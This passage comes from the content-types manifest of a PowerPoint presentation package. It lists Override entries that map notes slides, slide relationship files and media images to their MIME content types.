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86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide61.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide97.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide95.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide88.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide7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77.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide83.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide79.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide124.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide93.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide9.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide3.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide69.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide61.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide79.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide95.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide86.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19.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide31.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide22.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide133.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide124.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide90.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide96.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide91.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide97.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide92.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide156.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide27.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111.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide24.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide73.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide88.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide116.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide32.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide7.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide128.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide85.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide48.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide64.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide131.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide77.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide46.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide144.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide157.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide63.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide105.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide93.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide67.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide52.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide83.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide149.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide150.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide108.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide138.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide154.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide152.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide91.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide92.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide96.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide133.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1.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image52.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image50.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image46.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image45.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image44.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image47.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image21.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image58.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image14.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image57.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image22.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image59.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image24.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image68.gif" ContentType="image/gif"/>
  <Override PartName="/ppt/media/image62.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image69.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image70.gif" ContentType="image/gif"/>
  <Override PartName="/ppt/media/image63.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image67.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image30.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image66.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image27.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image64.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image65.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image28.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image60.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image26.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image25.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image40.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image61.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image42.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.gif" ContentType="image/gif"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image11.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image48.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8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image38.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image39.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image2.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image34.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image35.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image41.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image43.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76.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide153.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide109.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide75.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide108.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide152.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide107.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide74.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide151.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide104.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide71.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide101.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide24.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide94.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide127.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide26.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide103.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide70.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide73.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide150.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide106.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide69.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide93.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide49.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide126.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide25.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide102.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide72.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide105.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide68.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide131.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide143.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide139.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide54.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide144.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide77.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide133.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide138.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide142.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide147.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132.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide157.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide52.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide55.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide40.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide145.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide130.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide5.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide135.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide30.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide79.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide97.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide44.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110.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide129.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide96.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide43.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide85.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide118.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide88.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78.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12.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28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide95.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7.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide113.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide80.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide36.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide28.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide114.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide81.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide37.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide137.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide146.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53.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide149.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide23.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide100.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide156.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide51.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide111.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide34.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31.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide117.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide84.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide120.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide83.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide116.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide39.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136.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide2.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide119.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide86.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15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide38.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide82.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide112.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide35.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide148.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54.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide58.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide155.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide123.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide46.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide90.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide124.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide47.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide91.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide62.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide140.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide63.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide141.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121.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide66.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide122.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide67.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide125.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide48.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide92.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/slide127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
